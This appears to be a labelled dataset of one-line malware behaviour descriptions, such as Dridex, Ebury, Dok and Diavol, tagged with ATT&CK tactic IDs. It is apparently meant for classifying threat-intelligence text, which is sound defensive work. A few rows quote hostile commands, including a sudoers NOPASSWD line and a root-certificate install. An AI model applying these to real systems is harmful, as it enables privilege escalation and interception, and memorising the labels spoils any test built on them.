Daserf uses HTTP for C2.,['TA0011:Command and Control']
Daserf can execute shell commands.,['TA0002:Execution']
DealersChoice leverages vulnerable versions of Flash to perform execution.,['TA0002:Execution']
DealersChoice uses HTTP for communication with the C2 server.,['TA0011:Command and Control']
DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.,['TA0002:Execution']
Denis compressed collected data using zlib.,['TA0009:Collection']
Denis has encoded its PowerShell commands in Base64.,['TA0005:Defense Evasion']
Denis exploits a security vulnerability to load a fake DLL and execute its code.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Denis has used DNS tunneling for C2 communications.,['TA0011:Command and Control']
Denis will decrypt important strings used for C&C communication.,['TA0005:Defense Evasion']
Denis has a command to delete files from the victim’s machine.,['TA0005:Defense Evasion']
Denis has several commands to search directories for files.,['TA0007:Discovery']
"Denis replaces the nonexistent Windows DLL ""msfte.dll"" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Denis deploys additional backdoors and hacking tools to the system.,['TA0011:Command and Control']
"Denis used the IsDebuggerPresent, OutputDebugString, and SetLastError APIs to avoid debugging. Denis used GetProcAddress and LoadLibrary to dynamically resolve APIs. Denis also used the Wow64SetThreadContext API as part of a process hollowing process.",['TA0002:Execution']
Denis obfuscates its code and encrypts the API names.,['TA0005:Defense Evasion']
Denis has a version written in PowerShell.,['TA0002:Execution']
"Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Denis queries the Registry for keys and values.,['TA0007:Discovery']
Denis encodes the data sent to the server in Base64.,['TA0011:Command and Control']
"Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Denis collects OS information and the computer name from the victim’s machine.,['TA0007:Discovery']
Denis uses ipconfig to gather the IP address from the system.,['TA0007:Discovery']
Denis enumerates and collects the username from the victim’s machine.,['TA0007:Discovery']
Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.,['TA0002:Execution']
Derusbi is capable of performing audio captures.,['TA0009:Collection']
Derusbi injects itself into the secure shell process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Derusbi uses a backup communication method with an HTTP beacon.,['TA0011:Command and Control']
Derusbi is capable of deleting files. It has been observed loading a Linux Kernel Module and then deleting it from the hard disk as well as overwriting the data with null bytes.,['TA0005:Defense Evasion']
"Derusbi is capable of obtaining directory, file, and drive listings.",['TA0007:Discovery']
Derusbi is capable of logging keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.,['TA0011:Command and Control']
Derusbi has used unencrypted HTTP on port 443 for C2.,['TA0011:Command and Control']
Derusbi collects current and parent process IDs.,['TA0007:Discovery']
Derusbi is capable of enumerating Registry keys and values.,['TA0007:Discovery']
Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.,['TA0005:Defense Evasion']
Derusbi is capable of performing screen captures.,['TA0009:Collection']
Derusbi obfuscates C2 traffic with variable 4-byte XOR keys.,['TA0011:Command and Control']
"Derusbi gathers the name of the local host, version of GNU Compiler Collection , and the system information about the CPU, machine, and operating system.",['TA0007:Discovery']
"A Linux version of Derusbi checks if the victim user ID is anything other than zero , and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim.",['TA0007:Discovery']
The Derusbi malware supports timestomping.,['TA0005:Defense Evasion']
Derusbi is capable of creating a remote Bash shell and executing commands.,['TA0002:Execution']
Derusbi is capable of capturing video.,['TA0009:Collection']
Diavol can delete specified files from a targeted system.,['TA0040:Impact']
"Diavol has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with "".lock64"".",['TA0040:Impact']
Diavol can attempt to stop security software.,['TA0005:Defense Evasion']
Diavol has a command to traverse the files and directories in a given path.,['TA0007:Discovery']
Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.,['TA0011:Command and Control']
Diavol can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.,['TA0040:Impact']
"After encryption, Diavol will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text “All your files are encrypted! For more information see “README-FOR-DECRYPT.txt"".",['TA0040:Impact']
"Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.",['TA0002:Execution']
Diavol has a `ENMDSKS` command to enumerates available network shares.,['TA0007:Discovery']
Diavol has Base64 encoded the RSA public key used for encrypting files.,['TA0005:Defense Evasion']
"Diavol has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system.",['TA0007:Discovery']
Diavol can use the ARP table to find remote hosts to scan.,['TA0007:Discovery']
Diavol can spread throughout a network via SMB prior to encryption.,['TA0008:Lateral Movement']
Diavol will terminate services using the Service Control Manager API.,['TA0040:Impact']
Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.,['TA0005:Defense Evasion']
Diavol can collect the computer name and OS version from the system.,['TA0007:Discovery']
Diavol can enumerate victims' local and external IPs when registering with C2.,['TA0007:Discovery']
Diavol can collect the username from a compromised host.,['TA0007:Discovery']
Diavol has used HTTP GET and POST requests for C2.,['TA0011:Command and Control']
Dipsind can download remote files.,['TA0011:Command and Control']
"Dipsind can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.",['TA0010:Exfiltration']
Dipsind encodes C2 traffic with base64.,['TA0011:Command and Control']
Dipsind encrypts C2 data with AES256 in ECB mode.,['TA0011:Command and Control']
Dipsind uses HTTP for C2.,['TA0011:Command and Control']
Dipsind can spawn remote shells.,['TA0002:Execution']
A Dipsind variant registers as a Winlogon Event Notify DLL to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Disco has achieved initial access and execution through content injection into DNS, HTTP, and SMB replies to targeted hosts that redirect them to download malicious files.","['TA0011:Command and Control', 'TA0001:Initial Access']"
Disco can use SMB to transfer files.,['TA0011:Command and Control']
Disco can download files to targeted systems via SMB.,['TA0011:Command and Control']
Disco has been executed through inducing user interaction with malicious .zip and .msi files.,['TA0002:Execution']
Disco can create a scheduled task to run every minute for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
DnsSystem can direct queries to custom DNS servers and return C2 commands using TXT records.,['TA0011:Command and Control']
DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string.,['TA0009:Collection']
DnsSystem can exfiltrate collected data to its C2 server.,['TA0010:Exfiltration']
DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`.,['TA0011:Command and Control']
DnsSystem has lured victims into opening macro-enabled Word documents for execution.,['TA0002:Execution']
DnsSystem can write itself to the Startup folder to gain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DnsSystem can Base64 encode data sent to C2.,['TA0011:Command and Control']
DnsSystem can use the Windows user name to create a unique identification for infected users and systems.,['TA0007:Discovery']
DnsSystem can use `cmd.exe` for execution.,['TA0002:Execution']
Dok proxies web traffic to potentially monitor and alter victim HTTP traffic.,"['TA0009:Collection', 'TA0006:Credential Access']"
Dok uses AppleScript to create a login item for persistence.,['TA0002:Execution']
Dok exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.,['TA0010:Exfiltration']
Dok prompts the user for credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename.,['TA0005:Defense Evasion']
Dok installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format com.random.name.plist.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dok gives all users execute permissions for the application using the command chmod +x /Users/Shared/AppStore.app.,['TA0005:Defense Evasion']
Dok uses AppleScript to install a login Item by sending Apple events to the System Events process.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dok downloads and installs Tor via homebrew.,['TA0011:Command and Control']
Dok is packed with an UPX executable packer.,['TA0005:Defense Evasion']
Dok adds admin ALL= NOPASSWD: ALL to the /etc/sudoers file.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Doki has used the embedTLS library for network communications.,['TA0011:Command and Control']
Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.,['TA0010:Exfiltration']
Doki was run through a deployed container.,"['TA0005:Defense Evasion', 'TA0002:Execution']"
Doki has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.,['TA0011:Command and Control']
Doki’s container was configured to bind the host root directory.,['TA0004:Privilege Escalation']
Doki has used Ngrok to establish C2 and exfiltrate data.,['TA0010:Exfiltration']
Doki was executed through an open Docker daemon API port.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Doki has resolved the path of a process PID to use as a script argument.,['TA0007:Discovery']
Doki has downloaded scripts from C2.,['TA0011:Command and Control']
Doki has disguised a file as a Linux kernel module.,['TA0005:Defense Evasion']
Doki has searched for the current process’s PID.,['TA0007:Discovery']
Doki has executed shell scripts with /bin/sh.,['TA0002:Execution']
Doki has communicated with C2 over HTTPS.,['TA0011:Command and Control']
Doki has used the dogechain.info API to generate a C2 address.,['TA0011:Command and Control']
Donut can generate shellcode outputs that execute via Ruby.,['TA0002:Execution']
"Donut can patch Antimalware Scan Interface , Windows Lockdown Policy , as well as exit-related Native API functions to avoid process termination.",['TA0005:Defense Evasion']
Donut can erase file references to payloads in-memory after being reflectively loaded and executed.,['TA0005:Defense Evasion']
Donut can download and execute previously staged shellcode payloads.,['TA0011:Command and Control']
Donut can generate shellcode outputs that execute via JavaScript or JScript.,['TA0002:Execution']
Donut code modules use various API functions to load and inject code.,['TA0002:Execution']
"Donut can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.",['TA0005:Defense Evasion']
Donut can generate shellcode outputs that execute via PowerShell.,['TA0002:Execution']
Donut includes subprojects that enumerate and identify information about Process Injection candidates.,['TA0007:Discovery']
Donut includes a subproject DonutTest to inject shellcode into a target process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Donut can generate shellcode outputs that execute via Python.,['TA0002:Execution']
"Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.",['TA0005:Defense Evasion']
Donut can generate packed code modules.,['TA0005:Defense Evasion']
Donut can generate shellcode outputs that execute via VBScript.,['TA0002:Execution']
Donut can use HTTP to download previously staged shellcode payloads.,['TA0011:Command and Control']
DownPaper uses PowerShell for execution.,['TA0002:Execution']
DownPaper searches and reads the value of the Windows Update Registry Run key.,['TA0007:Discovery']
DownPaper uses PowerShell to add a Registry Run key in order to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"DownPaper collects the victim host name and serial number, and then sends the information to the C2 server.",['TA0007:Discovery']
DownPaper collects the victim username and sends it to the C2 server.,['TA0007:Discovery']
DownPaper communicates to its C2 server over HTTP.,['TA0011:Command and Control']
DownPaper uses the command line.,['TA0002:Execution']
Downdelph bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.",['TA0011:Command and Control']
"Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.",['TA0011:Command and Control']
Downdelph uses RC4 to encrypt C2 responses.,['TA0011:Command and Control']
Dridex has encrypted traffic with RSA.,['TA0011:Command and Control']
"Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.",['TA0009:Collection']
Dridex can abuse legitimate Windows executables to side-load malicious DLL files.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dridex has relied upon users clicking on a malicious attachment delivered through spearphishing.,['TA0002:Execution']
Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.,['TA0011:Command and Control']
Dridex has used the OutputDebugStringW function to avoid malware analysis as part of its anti-debugging technique.,['TA0002:Execution']
Dridex's strings are obfuscated using RC4.,['TA0005:Defense Evasion']
Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.,['TA0011:Command and Control']
Dridex can use `regsvr32.exe` to initiate malicious code.,['TA0005:Defense Evasion']
Dridex contains a module for VNC.,['TA0011:Command and Control']
"Dridex can maintain persistence via the creation of scheduled tasks within system directories such as `windows\system32\`, `windows\syswow64,` `winnt\system32`, and `winnt\syswow64`.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dridex has collected a list of installed software on the system.,['TA0007:Discovery']
Dridex has encrypted traffic with RC4.,['TA0011:Command and Control']
Dridex has collected the computer name and OS architecture information from the system.,['TA0007:Discovery']
Dridex has used POST requests and HTTPS for C2 communications.,['TA0011:Command and Control']
DropBook can unarchive data downloaded from the C2 to obtain the payload and persistence modules.,['TA0005:Defense Evasion']
DropBook has used legitimate web services to exfiltrate data.,['TA0010:Exfiltration']
DropBook can collect the names of all files and folders in the Program Files directories.,['TA0007:Discovery']
DropBook can download and execute additional files.,['TA0011:Command and Control']
DropBook is a Python-based backdoor compiled with PyInstaller.,['TA0002:Execution']
DropBook has checked for the presence of Arabic language in the infected machine's settings.,['TA0007:Discovery']
DropBook has checked for the presence of Arabic language in the infected machine's settings.,['TA0007:Discovery']
"DropBook can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.",['TA0011:Command and Control']
DropBook can execute arbitrary shell commands on the victims' machines.,['TA0002:Execution']
Drovorub can transfer files from the victim machine.,['TA0009:Collection']
Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages.,['TA0005:Defense Evasion']
Drovorub can exfiltrate files over C2 infrastructure.,['TA0010:Exfiltration']
Drovorub can delete specific files from a compromised host.,['TA0005:Defense Evasion']
Drovorub can download files to a compromised host.,['TA0011:Command and Control']
Drovorub can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.,['TA0011:Command and Control']
Drovorub can use kernel modules to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Drovorub can use TCP to communicate between its agent and client modules.,['TA0011:Command and Control']
Drovorub has used XOR encrypted payloads in WebSocket client to server messages.,['TA0005:Defense Evasion']
"Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.",['TA0005:Defense Evasion']
Drovorub can execute arbitrary commands as root on a compromised system.,['TA0002:Execution']
Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.,['TA0011:Command and Control']
Dtrack packs collected data into a password protected archive.,['TA0009:Collection']
Dtrack’s RAT makes a persistent target file with auto execution on the host start.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dtrack can retrieve browser history.,['TA0007:Discovery']
Dtrack can collect a variety of information from victim machines.,['TA0009:Collection']
Dtrack has used a decryption routine that is part of an executable physical patch.,['TA0005:Defense Evasion']
Dtrack has used a dropper that embeds an encrypted payload as extra data.,['TA0005:Defense Evasion']
Dtrack can remove its persistence and delete itself.,['TA0005:Defense Evasion']
Dtrack can list files on available disk volumes.,['TA0007:Discovery']
One of Dtrack can replace the normal flow of a program execution with malicious code.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dtrack’s can download and upload a file to the victim’s computer.,['TA0011:Command and Control']
Dtrack’s dropper contains a keylogging executable.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Dtrack can save collected data to disk, different file formats, and network shares.",['TA0009:Collection']
"One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.",['TA0005:Defense Evasion']
Dtrack’s dropper can list all running processes.,['TA0007:Discovery']
Dtrack has used process hollowing shellcode to target a predefined list of processes from %SYSTEM32%.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Dtrack can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.",['TA0007:Discovery']
Dtrack contains a function that calls LoadLibrary and GetProcAddress.,['TA0002:Execution']
"Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier.",['TA0007:Discovery']
Dtrack can collect the host's IP addresses using the ipconfig command.,['TA0007:Discovery']
Dtrack can collect network and active connection information.,['TA0007:Discovery']
Dtrack used hard-coded credentials to gain access to a network share.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dtrack has used cmd.exe to add a persistent service.,['TA0002:Execution']
Dtrack can add a service called WBService to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.",['TA0011:Command and Control']
The discovery modules used with Duqu can collect information on open windows.,['TA0007:Discovery']
"Modules can be pushed to and executed by Duqu that copy data to a staging area, compress it, and XOR encrypt it.",['TA0009:Collection']
Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system .,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.,['TA0011:Command and Control']
Duqu can track key presses with a keylogger module.,"['TA0009:Collection', 'TA0006:Credential Access']"
The discovery modules used with Duqu can collect information on accounts and permissions.,['TA0007:Discovery']
"Modules can be pushed to and executed by Duqu that copy data to a staging area, compress it, and XOR encrypt it.",['TA0009:Collection']
"Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.",['TA0005:Defense Evasion']
The discovery modules used with Duqu can collect information on process details.,['TA0007:Discovery']
Duqu is capable of loading executable code via process hollowing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.",['TA0011:Command and Control']
Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials . The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,['TA0008:Lateral Movement']
Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials . The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"When the Duqu command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.",['TA0011:Command and Control']
The Duqu command and control protocol's data stream can be encrypted with AES-CBC.,['TA0011:Command and Control']
The reconnaissance modules used with Duqu can collect information on network configuration.,['TA0007:Discovery']
The discovery modules used with Duqu can collect information on network connections.,['TA0007:Discovery']
Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials . The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Duqu creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DustySky can compress files via RAR while staging data to be exfiltrated.,['TA0009:Collection']
DustySky has exfiltrated data to the C2 server.,['TA0010:Exfiltration']
"DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.",['TA0011:Command and Control']
DustySky can delete files it creates from the infected system.,['TA0005:Defense Evasion']
"DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.",['TA0007:Discovery']
DustySky contains a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
DustySky searches for network drives and removable media and duplicates itself onto them.,['TA0008:Lateral Movement']
DustySky created folders in temp directories to host collected files before exfiltration.,['TA0009:Collection']
The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware.,['TA0005:Defense Evasion']
DustySky can detect connected USB devices.,['TA0007:Discovery']
DustySky collects information about running processes from victims.,['TA0007:Discovery']
DustySky achieves persistence by creating a Registry entry in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
DustySky searches for removable media and duplicates itself onto it.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
DustySky captures PNG screenshots of the main screen.,['TA0009:Collection']
DustySky checks for the existence of anti-virus.,['TA0007:Discovery']
DustySky lists all installed software for the infected machine.,['TA0007:Discovery']
DustySky extracts basic information about the operating system.,['TA0007:Discovery']
DustySky has used both HTTP and HTTPS for C2.,['TA0011:Command and Control']
The DustySky dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.,['TA0002:Execution']
Dyre decrypts resources needed for targeting the victim.,['TA0005:Defense Evasion']
Dyre injects into other processes to load modules.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Dyre has the ability to send information staged on a compromised host externally to C2.,['TA0010:Exfiltration']
Dyre has a command to download and executes additional files.,['TA0011:Command and Control']
Dyre has the ability to create files in a TEMP folder to act as a database to store information.,['TA0009:Collection']
Dyre has the ability to directly inject its code into the web browser process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Dyre has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Dyre has the ability to identify installed programs on a compromised host.,['TA0007:Discovery']
Dyre has been delivered with encrypted resources and must be unpacked for execution.,['TA0005:Defense Evasion']
Dyre can detect sandbox analysis environments by inspecting the process list and Registry.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Dyre has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.",['TA0007:Discovery']
Dyre has the ability to identify network settings on a compromised host.,['TA0007:Discovery']
Dyre has the ability to identify the users on a compromised host.,['TA0007:Discovery']
Dyre has the ability to identify running services on a compromised host.,['TA0007:Discovery']
Dyre uses HTTPS for C2 communications.,['TA0011:Command and Control']
Dyre registers itself as a service by adding several Registry keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ECCENTRICBANDWAGON can delete log files generated from the malware stored at C:\windows\temp\tmp0207.,['TA0005:Defense Evasion']
ECCENTRICBANDWAGON can capture and store keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
"ECCENTRICBANDWAGON has stored keystrokes and screenshots within the %temp%\GoogleChrome, %temp%\Downloads, and %temp%\TrendMicroUpdate directories.",['TA0009:Collection']
ECCENTRICBANDWAGON has encrypted strings with RC4.,['TA0005:Defense Evasion']
ECCENTRICBANDWAGON can capture screenshots and store them locally.,['TA0009:Collection']
ECCENTRICBANDWAGON can use cmd to execute commands on a victim’s machine.,['TA0002:Execution']
EKANS uses standard encryption library functions to encrypt files.,['TA0040:Impact']
EKANS stops processes related to security and management software.,['TA0005:Defense Evasion']
EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.,['TA0040:Impact']
EKANS has been disguised as update.exe to appear as a valid executable.,['TA0005:Defense Evasion']
EKANS uses encoded strings in its process kill list.,['TA0005:Defense Evasion']
EKANS looks for processes from a hard-coded list.,['TA0007:Discovery']
"EKANS stops database, data backup solution, antivirus, and ICS-related processes.",['TA0040:Impact']
EKANS can determine the domain of a compromised host.,['TA0007:Discovery']
EKANS can use Windows Mangement Instrumentation calls to execute operations.,['TA0002:Execution']
ELMER is capable of performing directory listings.,['TA0007:Discovery']
ELMER is capable of performing process listings.,['TA0007:Discovery']
ELMER uses HTTP for command and control.,['TA0011:Command and Control']
EVILNUM can upload files over the C2 channel from the infected host.,['TA0010:Exfiltration']
"EVILNUM has a function called ""DeleteLeftovers"" to remove certain artifacts of the attack.",['TA0005:Defense Evasion']
EVILNUM can download and upload files to the victim's computer.,['TA0011:Command and Control']
EVILNUM can make modifications to the Regsitry for persistence.,['TA0005:Defense Evasion']
EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.,['TA0011:Command and Control']
EVILNUM can achieve persistence through the Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.,['TA0005:Defense Evasion']
EVILNUM can execute commands and scripts through rundll32.,['TA0005:Defense Evasion']
EVILNUM can search for anti-virus products on the system.,['TA0007:Discovery']
EVILNUM can harvest cookies and upload them to the C2 server.,['TA0006:Credential Access']
EVILNUM can obtain the computer name from the victim's system.,['TA0007:Discovery']
EVILNUM can obtain the username from the victim's machine.,['TA0007:Discovery']
EVILNUM has changed the creation date of files.,['TA0005:Defense Evasion']
EVILNUM has used the Windows Management Instrumentation tool to enumerate infected machines.,['TA0002:Execution']
"If credentials are not collected for two weeks, Ebury encrypts the credentials using a public key and sends them via UDP to an IP address located in the DNS TXT record.",['TA0010:Exfiltration']
Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems.,['TA0005:Defense Evasion']
Ebury modifies the `keyutils` library to add malicious behavior to the OpenSSH client and the curl library.,['TA0003:Persistence']
Ebury has used DNS requests over UDP port 53 for C2.,['TA0011:Command and Control']
Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.,['TA0005:Defense Evasion']
"Ebury disables OpenSSH, system , and audit logs when the backdoor is active.",['TA0005:Defense Evasion']
Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules.,['TA0005:Defense Evasion']
Ebury has used a DGA to generate a domain name for C2.,['TA0011:Command and Control']
"When Ebury is running as an OpenSSH server, it uses LD_PRELOAD to inject its malicious shared module in to programs launched by SSH sessions. Ebury hooks the following functions from `libc` to inject into subprocesses; `system`, `popen`, `execve`, `execvpe`, `execv`, `execvp`, and `execl`.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ebury exfiltrates a list of outbound and inbound SSH sessions using OpenSSH's `known_host` files and `wtmp` records. Ebury can exfiltrate SSH credentials through custom DNS queries or use the command `Xcat` to send the process's ssh session's credentials to the C2 server.,['TA0010:Exfiltration']
Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.,['TA0011:Command and Control']
"Ebury hooks system functions to prevent the user from seeing malicious files , hide process activity , and socket activity .",['TA0005:Defense Evasion']
Ebury can intercept private keys using a trojanized ssh-add function.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Ebury has obfuscated its strings with a simple XOR encryption with a static key.,['TA0005:Defense Evasion']
Ebury can deactivate PAM modules to tamper with the sshd configuration.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Ebury has intercepted unencrypted private keys as well as private key pass-phrases.,['TA0006:Credential Access']
Ebury has used Python to implement its DGA.,['TA0002:Execution']
Ebury acts as a user land rootkit using the SSH service.,['TA0005:Defense Evasion']
Ebury is executed through hooking the keyutils.so file used by legitimate versions of `OpenSSH` and `libcurl`.,['TA0002:Execution']
Ebury has encoded C2 traffic in hexadecimal format.,['TA0011:Command and Control']
"Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.",['TA0011:Command and Control']
Ebury can use the commands `Xcsh` or `Xcls` to open a shell with Ebury level permissions and `Xxsh` to open a shell with root level.,['TA0002:Execution']
"Ecipekac has used a valid, legitimate digital signature to evade detection.",['TA0005:Defense Evasion']
Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ecipekac has the ability to decrypt fileless loader modules.,['TA0005:Defense Evasion']
Ecipekac can download additional payloads to a compromised host.,['TA0011:Command and Control']
"Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.",['TA0005:Defense Evasion']
Egregor has used BITSadmin to download and execute malicious DLLs.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Egregor has used DLL side-loading to execute its payload.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.,['TA0040:Impact']
Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.,['TA0009:Collection']
Egregor has been decrypted before execution.,['TA0005:Defense Evasion']
Egregor has disabled Windows Defender to evade protections.,['TA0005:Defense Evasion']
Egregor can conduct Active Directory reconnaissance using tools such as Sharphound or AdFind.,['TA0007:Discovery']
Egregor can modify the GPO to evade detection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Egregor has the ability to download files from its C2 server.,['TA0011:Command and Control']
Egregor has masqueraded the svchost.exe process to exfiltrate data.,['TA0005:Defense Evasion']
Egregor has used the Windows API to make detection more difficult.,['TA0002:Execution']
Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.,['TA0002:Execution']
Egregor can inject its payload into iexplore.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Egregor has used regsvr32.exe to execute malicious DLLs.,['TA0005:Defense Evasion']
Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.,['TA0011:Command and Control']
